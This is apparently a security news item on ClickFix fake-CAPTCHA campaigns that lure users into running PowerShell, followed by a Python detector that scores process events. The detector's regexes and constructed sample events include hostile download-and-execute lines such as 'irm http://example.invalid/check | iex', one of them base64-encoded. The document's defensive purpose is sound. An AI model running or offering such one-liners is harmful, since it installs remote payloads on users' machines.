The attack relies on social engineering to trick users into copying and running a malicious PowerShell payload disguised as a browser verification step.
Social Engineering with Fake Security Checks
Attackers are using deceptive CAPTCHA and ClickFix prompts to trick users into running malicious scripts that steal credentials. Victims visit seemingly legitimate sites where they encounter a fake CAPTCHA verification page. Instead of proving they are human, the page instructs them to press a key combination that copies a malicious PowerShell command to the clipboard and then opens Windows Run to execute it. This technique bypasses traditional security controls because the user voluntarily triggers the infection chain.
Impact and Indicators of Compromise
The campaign targets users across various industries, aiming to harvest login credentials for corporate networks, email accounts, and cloud services. Once credentials are stolen, attackers can move laterally, deploy ransomware, or exfiltrate sensitive data. No specific CVEs are associated with this attack vector, since it exploits human behavior rather than software vulnerabilities. Organizations should nevertheless monitor for unusual clipboard access requests and for unexpected PowerShell executions, particularly ones launched from the Run dialog. Users should treat any CAPTCHA page that demands manual command execution as suspicious, and report any prompt that asks them to press Win+R or Ctrl+V after a verification step.
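The monitoring advice above can be turned into a concrete triage rule. The following Python is an added example for this article, not code from the article or from any vendor: it scores Windows process-creation events for the pattern described in the two sections above. A command entered in the Win+R Run dialog is started by explorer.exe, so that parent is the first, deliberately weak, indicator; the remaining weight comes from the PowerShell command line itself (hidden window, execution-policy bypass, an -EncodedCommand blob that is decoded and inspected, and download-and-execute keywords). The sample events are constructed, the field names follow the Sysmon Event ID 1 convention (ParentImage, Image, CommandLine), and the weights and threshold are assumptions chosen for the example.

```python
"""Triage Windows process-creation events for ClickFix-style PowerShell launches.

Added example for this article; the events below are constructed, not real
telemetry. Field names follow the Sysmon Event ID 1 convention (ParentImage,
Image, CommandLine) so the logic maps onto a common log source.
"""
import base64
import re

# A command typed into the Win+R Run dialog is started by explorer.exe, so that
# parent is the first (weak) indicator. Every other signal comes from the
# PowerShell command line itself.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
EP_BYPASS_RE = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I)
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_RE = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I)
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)

# (weight, regex, description): the weights are assumptions chosen for this example.
COMMAND_LINE_SIGNALS = [
    (2, HIDDEN_RE, "hidden window requested"),
    (2, EP_BYPASS_RE, "execution policy bypass"),
    (2, DOWNLOAD_RE, "remote content download"),
    (2, IEX_RE, "in-memory execution via Invoke-Expression"),
]


def encode_for_powershell(text: str) -> str:
    """UTF-16LE base64 form that -EncodedCommand expects (used here only to build sample data)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse the -EncodedCommand encoding; return '' if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event; non-PowerShell images score 0."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    score, reasons = 0, []
    if event.get("ParentImage", "").lower().endswith("explorer.exe"):
        score += 1
        reasons.append("parent is explorer.exe (consistent with Win+R Run dialog)")
    cmd = event.get("CommandLine", "")
    m = ENC_RE.search(cmd)
    if m:
        score += 2
        reasons.append("encoded command present")
        cmd += " " + decode_encoded_command(m.group(1))  # inspect the decoded payload too
    for weight, pattern, description in COMMAND_LINE_SIGNALS:
        if pattern.search(cmd):
            score += weight
            reasons.append(description)
    return score, reasons


def triage(events: list[dict], threshold: int = 4) -> list[dict]:
    """Score every event; 'suspicious' is True once the score reaches the (assumed) threshold."""
    results = []
    for event in events:
        score, reasons = score_event(event)
        results.append({"CommandLine": event.get("CommandLine", ""), "score": score,
                        "reasons": reasons, "suspicious": score >= threshold})
    return results


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample telemetry, not captured from a real host
    # ClickFix-style: pasted into Run, hidden window, policy bypass, download-and-run
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -ep bypass -c "irm http://example.invalid/check | iex"'},
    # Same idea wrapped in -enc; the download/execute keywords are only visible after decoding
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -nop -w hidden -enc "
                    + encode_for_powershell("iwr http://example.invalid/v | iex")},
    # Benign scheduled script launched from cmd.exe
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\nightly-backup.ps1"},
    # User opened an interactive console from the Start menu: explorer parent alone is not enough
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine": "powershell.exe"},
    # Not PowerShell at all
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} score={r['score']} {r['CommandLine'][:60]}")
        for reason in r["reasons"]:
            print("    -", reason)
```

Run stand-alone, the first two constructed events are flagged and the other three are not. The explorer.exe parent is weighted low on purpose: every shortcut or Start-menu launch has the same parent, so on its own it only tells you the process came from the interactive desktop rather than from a scheduler or a service. Decoding the -EncodedCommand blob before matching matters because the keywords a rule looks for are otherwise invisible in the raw command line.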
Source: Cyber Security News

